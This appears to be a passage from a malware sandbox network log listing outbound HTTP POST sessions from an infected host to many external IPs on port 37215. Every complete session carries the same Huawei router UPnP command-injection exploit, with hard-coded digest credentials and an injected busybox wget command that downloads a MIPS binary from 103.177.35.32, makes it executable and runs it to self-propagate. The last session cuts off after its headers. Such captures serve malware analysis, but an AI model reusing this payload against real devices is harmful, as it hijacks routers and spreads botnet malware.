                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        117192.168.2.2355678197.16.62.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293121099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        118192.168.2.2354580157.29.250.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293148041 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        119192.168.2.235820441.172.227.8537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293150902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        120192.168.2.2349630157.153.65.20937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293174982 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        121192.168.2.2358860197.112.122.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293553114 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        122192.168.2.2359372157.124.117.9537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293627024 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        123192.168.2.2344076157.216.87.937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293699026 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        124192.168.2.2336830197.63.156.10137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293759108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        125192.168.2.2350004197.128.51.16237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293762922 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        126192.168.2.234423241.88.241.10837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.294442892 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
